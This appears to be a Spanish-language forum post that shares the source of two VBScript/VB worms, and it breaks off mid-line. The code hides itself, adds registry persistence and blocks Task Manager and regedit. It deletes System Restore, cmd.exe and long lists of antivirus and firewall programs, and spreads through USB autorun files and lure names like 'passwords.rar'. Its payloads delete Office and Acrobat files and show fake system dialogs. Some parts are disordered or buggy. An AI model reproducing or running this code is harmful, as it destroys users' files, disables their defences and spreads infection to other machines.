Código
App.Taskvisible = False FileCopy App.Path & "\" & App.VBSname & ".vbs C:\Windows\System\services.vbs" Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services.vbs d/ C:\WINDOWS\System\services.vbs" 'el pequeñín ya está en el registro Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " " Kill "C:\WINDOWS\System32\shutdown.exe" Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f" Private Sub Form_Load() Form1.Visible = False MsgBox ("Runtime Error 492. El archivo está dañado o corrupto. Por favor, consiga otra copia."), vbCritical, "Fallo en la aplicación "" End Sub Open "C:\Windows\System32\winlog.bat" For Output As #1 Print #1, "@echo off" Print #1, "If exist E:\ (Copy /y C:\WINDOWS\System\services.vbs E:\services.vbs)" Print #1, "If exist F:\ (Copy /y C:\WINDOWS\System\services.vbs F:\services.vbs)" Print #1, "If exist G:\ (Copy /y C:\WINDOWS\System\services.vbs G:\services.vbs)" Print #1, "exit" Close #1 Shell ("C:\Windows\System32\Winlog.bat"), vbHide Kill "C:\WINDOWS\System32\Restore\rstrui.exe" Kill "C:\WINDOWS\System32\Restore\srdiag.exe" Kill "C:\Archivos de programa\ESET\nod32.exe" Kill "C:\Archivos de programa\ESET\nod32kui.exe" Kill "C:\Archivos de programa\ESET\nod32krn.exe" Kill "C:\Archivos de programa\ESET\nod32krr.dll" Kill "C:\Archivos de programa\ESET\nod32ari.dll" Kill "C:\Archivos de programa\ESET\ps_amon64.dll" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE" Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe" Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe" Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE" Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll" Kill "C:\Archivos de programa\AntiVir\avcenter.exe" Kill "C:\Archivos de programa\AntiVir\avscan.exe" Kill "C:\Archivos de programa\AntiVir\avnotify.exe" Kill "C:\Archivos de programa\AntiVir\guardgui.exe" Kill "C:\Archivos de programa\AntiVir\avgnt.exe" Kill "C:\Archivos de programa\AntiVir\avguard.exe" Kill "C:\Archivos de programa\AntiVir\avcmd.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe" Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll" Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe" Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe" Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe" Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe" Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll" Kill "C:\Archivos de programa\SpyBro\SpyBro.exe" Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe" Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe" Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe" Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe" Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe" Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe" Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe" Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin" Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe" Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe" Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe" Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe" Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe" Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe" Kill "C:\Archivos de programa\ATS2\ats.exe" Kill "C:\Archivos de programa\ATS2\d1.exe" Kill "C:\Archivos de programa\ATS2\sysinfo.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe" Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE" 'otra opción de copiado es la siguiente: 'FileCopy App.Path & App.VBSName & ".vbs", "E:\services.vbs" 'Ahora vamos a marcar nuestro dominio Set Worm = CreateObject("WScript.Shell") Worm.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.elhacker.net" Set firma = CreateObject("Wscript.Shell") firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta" Set firma = CreateObject("Wscript.Shell") firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica" 'comprimiendo el wormet Shell Winzip & "-a C:\porno.zip" & "C:\Windows\System\services.vbs" 'comprimir el virus 'para extraer: 'Shell Winzip & "-e C:\porno.zip" &"C:\" 'infectando RARs: Shell winrar & "a C:\confidencial.zip C:\WINDOWS\System\services.vbs" Shell winrar & "a C:\passwords.rar C:\WINDOWS\System\services.vbs" Sub Main() 'motor de búsqueda en infección: On Error Resume Next If HayExcel Or HayWord Then Fso.CopyFile MiNombreVBS, "F:\Abril Lavigne Desnuda.jpeg.vbs" Fso.CopyFile DirWin & "Web\Folder.htt", "F:\Folder.htt", True Fso.CopyFile DirWin & "Web\Desktop.ini", "F:\Desktop.ini", True SetAttr "F:\Abril Lavigne Desnuda.jpeg", vbReadOnly SetAttr "F:\Desktop.ini", vbHidden SetAttr "F:\Folder.htt", vbHidden End If End Sub 'infectando archivos de excel: Function HayExcel() As Boolean Dim ExcelObj As Object On Error GoTo NoExcel Set ExcelObj = GetObject(, "Excel.Application") If ExcelObj.ActiveWorkbook.Path = "F:\" Then HayExcel = True Exit Function End If NoExcel: HayExcel = False End Function Sub Main() 'Ahora un pequeño PayLoad If (Month(Now) = 6 or Month(Now) > 6) And (Day(Now) = 13 or Day(Now) < 13) Then MsgBox "Ándate con ojo porque dije que vendría y he venido", vbCritical, "Marca del Corruptor" MsgBox "Estás en mis manos... ¿quieres verlo?", vbExclamation, "Marca del Corruptor" MsgBox "DAME EL PaWeRrR!!!", vbExclamation, "Marca del Corruptor" MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema" End Sub Sub Main() Randomize Num = Rnd If Num = 0 Then MsgBox "Has tenido suerte, mi amo ha querido que te respete. Dale gracias", vbExclamation, "El Perro Fiero de San Pancracio" End If If Num = 1 Then MsgBox "Algo has hecho para merecer la ira de mi amo. Hoy la suerte te ha abandonado.", vbExclamation, "El Perro Fiero" Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA" Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab" Kill "C:\WINDOWS\System32\taskmgr.exe" 'esto borra el administrador de tareas Kill "C:\WINDOWS\Taskman.EXE" 'por si acaso, que no me fío Kill "C:\WINDOWS\System32\cmd.exe" 'esto elimina la opción de usar el MS-Dos Kill "C:\WINDOWS\regedit.exe" 'esto borra el editor del registro Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad Kill "C:\WINDOWS\System32\command.com" 'esto borra la otra opción de usar el MS-Dos End If End Sub Function Antidelete() Set fso = CreateObject("scripting.filesystemobject") Set Myself = fso.opentextfile(wscript.scriptfullname, 1) MyCode = Myself.readall Myself.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set Myself = fso.createtextfile(wscript.scriptfullname, True) Myself.write MyCode Myself.Close End If Loop End Function
Bueno, de hecho son dos códigos:
Código
'@echo off by Eliphas & Nehekara. Añoranza del Valhalla. 'por la gloria del Larisel IV, ahora y siempre 'Especiales agradecimientos a Octalh y a Hendrix App.Taskvisible = False MsgBox "Por fin nos hemos encontrado tú y yo.", vbExclamation, "Cherubael dice:" MsgBox "Sabrías que vendría y he venido.", vbExclamation, "Cherubael dice:" MsgBox "Nehekara no perdona los agravios recibidos.", vbExclamation, "Cherubael dice:" MsgBox "A sí que ahora afronta las consecuencias.", vbExclamation, "Cherubael dice:" MsgBox "Quod Erat Demostrandum...", vbExclamation, "Cherubael dice:" MsgBox "Todas las almas claman por su salvación.", vbExclamation, "Cherubael dice:" MsgBox "DAME EL PaWeRrR!!!", vbCritical, "Cherubael dice:" Sub Main() On Error Resume Next If Month(Now) = 12 And Day(Now) = 17 Then MsgBox "¿Confirma que desea desinstalar Windows de su sistema?", vbCritical, "Aviso del Sistema" End Sub Kill "C:\WINDOWS\System32\Restore\rstrui.exe" Kill "C:\WINDOWS\System32\Restore\srdiag.exe" Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v winlogon.exe d/ C:\WINDOWS\System\winlogon.exe" 'el pequeñín ya está en el registro Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " " Kill "C:\WINDOWS\System32\shutdown.exe" Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f" Sub Main() 'Dejando nuestra marca On Error Resume Next Set Cherubael = CreateObject("WScript.Shell") Cherubael.RegWrite ("HKLM\software\microsoft\Internet Explorer\Main\Start Page"), "http:www.CherubaeL.com.ar" Set firma = CreateObject("Wscript.Shell") firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOrganization"), "Heraldo de la Tormenta" Set firma = CreateObject("Wscript.Shell") firma.RegWrite ("HKLM\software\Microsoft\Windows NT\CurrentVersion\RegistredOwner"), "Zona de guerra bacteriológica" End Sub Sub Main() On Error Resume Next Randomize Num = Rnd If Num = 0 Then MsgBox "A pesar de todo, voy a apiadarme de tí. SOnríe, eres libre.", vbExclamation, "Cherubael dice:" End If If Num = 1 Then MsgBox "Lo siento, pero debo cumplir mis órdenes. Hoy la suerte te ha abandonado.", vbExclamation, "Cherubael dice:" Kill "C:\WINDOWS\System32\taskmgr.exe" Kill "C:\WINDOWS\Taskman.EXE" Kill "C:\WINDOWS\System32\cmd.exe" Kill "C:\WINDOWS\regedit.exe" Kill "C:\WINDOWS\System32\wscui.cpl" Kill "C:\WINDOWS\System32\command.com" Kill "C:\Archivos de programa\Microsoft Office\Office\EXCEL.EXE" 'hala!! a tomar por culo el office... Kill "C:\Archivos de programa\Microsoft Office\Office\GRAPH9.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\MSACCESS.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\POWERPNT.EXE" Kill "C:\Archivos de programa\Microsoft Office\Office\PPTTOOLS.PPA" Kill "C:\Archivos de programa\Microsoft Office\Office\FRONTPG.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\EXCEL.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\POWERPNT.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\MSPUB.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\OIS.EXE" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\EUROTOOL.XLA" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\Macros\HTML.XLA" Kill "C:\Archivos de programa\Microsoft Office\OFFICE11\GRAPH.EXE" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\ActiveX\pdfshell.dll" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Reader\AcroRd32.exe" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Setup.exe" Kill "C:\Archivos de programa\Adobe\Acrobat 7.0\Setup Files\RdrBig\ENU\Data1.cab" End If End Sub '[ MODELO DE OBJETOS ] Set fso = CreateObject("Scripting.FileSystemObject") ' ARCHIVOS Set WshShell = wscript.CreateObject("WScript.Shell") ' REGISTRO '[ CONSTANTES ] GUSANETname = wscript.ScriptName ' Indicamos que el nombre del GUSANET sera ' el que tenga en ese momento el archivo actual. GUSANET = "GUSANET.vbs" 'Nombre del exe que tendra el GUSANET en el sistema GUSANETpatch = fso.GetSpecialFolder(1) & "\" & GUSANET 'Indicamos el directorio donde se copiara el GUSANET, si utilizamos 'la funcion specialfolder podemos indicar el copiado a la carpeta del sistema (1) 'sin importar donde se encuentre. autorun = fso.GetSpecialFolder(1) & "\autorun.txt" 'lo mismo que en GUSANETpatch pero para el autorrun. GUSANETusb = ":\proyecto.exe" ' Nombre que tendra el GUSANET en el medio extraible autorunusb = ":\autorun.inf" ' Nombre que tendra el autorun en el medio extraible Const HKEY_LOCAL_MACHINE = &H80000002 'constante para modificar registro mas adelante '[ CHEQUEO DE INFECCION ] If Not infeccion(GUSANET) Then copiar GUSANETname, GUSANETpatch End If ' + INFECTAR REGISTRO DE WINDOWS + If Not keyexist("GUSANET", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\") Then crearentradareg() 'Si no existe la llave en el registro llamada GUSANET entonces la crea, con esto aseguramos 'el arranque del GUSANET con cada inicio del sistema. 'Subproceso que se encarga crear un archivo y escribir datos en el 'en este caso le indicamos que cree un archivo con la constante autorun 'que definimos desde el principio Sub makeautorun() On Error Resume Next Set mkaut = fso.createtextfile(autorun, True) 'creamos un archivo con el nombre de mkaut.WriteLine "[AUTORUN]" 'la constante autorun mkaut.WriteLine "open=" & GUSANETusb 'constante del nombre del ejecutable. mkaut.WriteLine "shell\1=abrir" mkaut.WriteLine "shell\1\Command=" & GUSANETusb mkaut.WriteLine "shell\2\=explorar" mkaut.WriteLine "shell\2\Command=" & GUSANETusb mkaut.WriteLine "shellexecute=" & GUSANETusb mkaut.Close End Sub 'aqui creamos el autorun que sirve para ejecutar el GUSANET cuando el pardillo haga doble click 'en el icono de la unidad extraible 'subproceso que se encarga de añadir atributos de oculto, sistema y solo lectura 'a cada archivo que compone al GUSANET Sub makeatributos() On Error Resume Next Dim archivosGUSANET(1) 'array archivosGUSANET que dentro de el contiene al GUSANET y su autorun archivosGUSANET(0) = GUSANETpatch archivosGUSANET(1) = autorun For Each file In archivosGUSANET ' por cada archivo dentro del array archivosGUSANET Set wormcontent = fso.GetFile(file) 'tomalos y wormcontent.Attributes = 7 'agregales atributos Next End Sub 'Funcion que se encarga de verificar que exista una llave en el registro Function keyexist(keyname, keyPath, regCategory) On Error Resume Next retVal = False strComputer = "." 'inicamos en cualquier computadora Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv") 'se crea un objeto oReg.EnumKey regCategory, keyPath, arrSubKeys 'partes de la clave del registro For Each subkey In arrSubKeys If keyname = subkey Then retVal = True Exit For End If Next keyExists = retVal End Function 'esta funcion basicamente se encarga de verificar que existan los valores que introduzcamos 'en ella que son keyname, keypath y regcategory, de esa manera comprobamos que exista 'cualquier llave en el registro con solo usar la funcion keyexist y el valor de nuestra 'llave a verficar 'Subproceso que se encarga de crear la llave en el registro Private Sub crearentradareg() On Error Resume Next WshShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GUSANET", _ GUSANETpatch, "REG_SZ" End Sub 'Subproceso que se encarga de copiar al GUSANET a una unidad extraible. Private Sub infekusb() On Error Resume Next Const DriveTypeRemovable = 1 ' indicamos medio extraible Do ' inicia loop infinito Set oFS = wscript.CreateObject("Scripting.FileSystemObject") Set oDrives = oFS.Drives 'declaramos todos los drivers For Each Drive In oDrives 'por cada driver If Drive.DriveType = DriveTypeRemovable Then 'si son del tipo removible entonces If Drive.DriveLetter <> "A" Then ' si la letra es de A-Z entonces If fso.fileexists(Drive.DriveLetter + autorunusb) Then ' si existe autorun Set cFile = fso.GetFile(Drive.DriveLetter + autorunusb) 'tomalo y cFile.Attributes = 0 ' quitale los atributos fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True 'despues copialo Else ' de lo contrario fso.CopyFile autorun, Drive.DriveLetter & autorunusb, True ' copialo End If fso.CopyFile GUSANETpatch, Drive.DriveLetter & GUSANETusb, True ' copia el GUSANET a la unidad End If End If Next Loop End Sub Sub Main() On Error Resume Next Kill "C:\Archivos de programa\ESET\nod32.exe" Kill "C:\Archivos de programa\ESET\nod32kui.exe" Kill "C:\Archivos de programa\ESET\nod32krn.exe" Kill "C:\Archivos de programa\ESET\nod32krr.dll" Kill "C:\Archivos de programa\ESET\nod32ari.dll" Kill "C:\Archivos de programa\ESET\ps_amon64.dll" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE" Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe" Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe" Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe" Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavProt.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\prevsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\AVENGINE.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\WebProxy.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PavFnSvr.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\FIREWALL\PNMSRV.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\AVENGINE.EXE" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\PsImSvc.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\apvxdwin.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium 2006 Antivirus + Antispyware\WebProxy.exe" Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\Pavsrv51.exe" Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2004\APVXDWIN.EXE" Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\TeaTimer.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\SpybotSD.exe" Kill "C:\Archivos de programa\Spybot - Search & Destroy\Advcheck.dll" Kill "C:\Archivos de programa\AntiVir\avcenter.exe" Kill "C:\Archivos de programa\AntiVir\avscan.exe" Kill "C:\Archivos de programa\AntiVir\avnotify.exe" Kill "C:\Archivos de programa\AntiVir\guardgui.exe" Kill "C:\Archivos de programa\AntiVir\avgnt.exe" Kill "C:\Archivos de programa\AntiVir\avguard.exe" Kill "C:\Archivos de programa\AntiVir\avcmd.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdlite.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdmcon.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\bdnagent.exe" Kill "C:\Archivos de programa\Softwin\BitDefender8\rtvr.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashAvast.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashBug.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashDisp.exe" Kill "C:\Archivos de programa\Alwil Software\Avast4\ashQuick.exe" Kill "C:\Archivos de programa\Norton AntiVirus\NavShExt.dll" Kill "C:\Archivos de programa\Norton AntiVirus\navapw32.exe" Kill "C:\Archivos de programa\Norton AntiVirus\navapsvc.exe" Kill "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\UdaterUI.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\McTray.exe" Kill "C:\Archivos de programa\McAfee\Common Framework\FrameworkService.exe" Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\Mcshield.exe" Kill "C:\Archivos de programa\McAfee\VirusScan Enterprise\VsTskMgr.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe" Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll" Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll" Kill "C:\Archivos de programa\SpyBro\SpyBro.exe" Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe" Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe" Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe" Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe" Kill 